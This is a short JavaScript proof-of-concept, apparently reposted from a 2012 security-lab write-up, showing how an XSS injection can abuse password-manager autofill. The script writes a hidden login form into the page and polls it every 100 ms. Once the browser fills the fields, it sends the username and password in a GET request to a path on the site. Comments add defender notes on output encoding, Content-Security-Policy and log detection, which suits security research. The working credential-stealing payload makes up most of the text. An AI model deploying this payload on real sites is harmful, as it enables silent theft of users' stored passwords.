<script type="text/javascript">
// Proof-of-concept for password-manager autofill abuse through an XSS flaw: the
// injected script draws its own login form, polls it until the fields hold
// values, then sends those values out in a GET request.
// Defender notes:
//  - Root cause is the injection point; contextual output encoding removes it.
//  - A Content-Security-Policy without 'unsafe-inline' / 'unsafe-eval' blocks
//    both this inline <script> and the string-form setInterval() below.
//  - Detection: requests whose query string carries username= / password=
//    (here to /pwxss) stand out in web-server and proxy logs.
//  - Password managers that fill only after a user gesture are less exposed
//    to silent polling of this kind.

// Assigned without var/let/const, so these become properties of the global object.
ex_username = '';
ex_password = '';
inter = ''; // replaced further down by the interval handle
function attack(){
    // Read whatever is currently in the two injected inputs.
    ex_username = document.getElementById('username').value;
    ex_password = document.getElementById('password').value;
    // Bitwise | on two comparisons: non-zero (truthy) when either field is non-empty.
    if(ex_username != '' | ex_password != ''){
        // Hide the injected form once values are present.
        document.getElementById('xss').style.display = 'none'
        request=new XMLHttpRequest();
        // Relative path, so as written the request goes to the page's own origin;
        // the credentials travel in the URL and therefore land in access logs.
        url = "/pwxss?username="+ex_username+"&password="+ex_password;
        request.open("GET",url,true);
        request.send();
        document.getElementById('xss').style.visibility='hidden';
        // Stop polling after the first send.
        window.clearInterval(inter);
    }
}
// Writes a form with username/password inputs (autocomplete='on') into the page.
// NOTE(review): action='index.php' presumably mirrors the site's real login
// handler so that stored credentials match; not verifiable from this listing.
document.write("\ <div id='xss'>\ <form method='post' action='index.php'>\ username:<input type='text' name='username' id='username' value='' autocomplete='on'>\ password:<input type='password' name='password' id='password' value='' autocomplete='on'>\ <input type='submit' name='login' value='Log In'>\ </form>\ </div>\ ");
// String argument is evaluated as code every 100 ms; the handle is kept so
// attack() can cancel the timer.
inter = window.setInterval("attack()",100);
</script> |
转载自:https://labs.neohapsis.com/2012/04/25/abusing-password-managers-with-xss/